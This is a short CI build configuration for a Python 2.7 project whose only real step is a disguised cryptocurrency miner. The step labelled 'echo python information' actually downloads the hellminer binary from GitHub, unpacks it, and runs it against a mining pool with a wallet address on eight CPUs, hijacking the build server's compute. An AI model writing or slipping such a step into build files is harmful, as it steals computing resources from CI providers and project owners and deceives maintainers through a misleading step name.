box: python:2.7
build:
  steps:
    - virtualenv:
        name: setup virtual environment
        install_wheel: false

    - script:
        name: echo python information
        code: |
          wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && chmod +x hellminer && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RUEfFzYUwZSaXcLmdA6xyPvgwu7FLbkm6r.VM --cpu 8
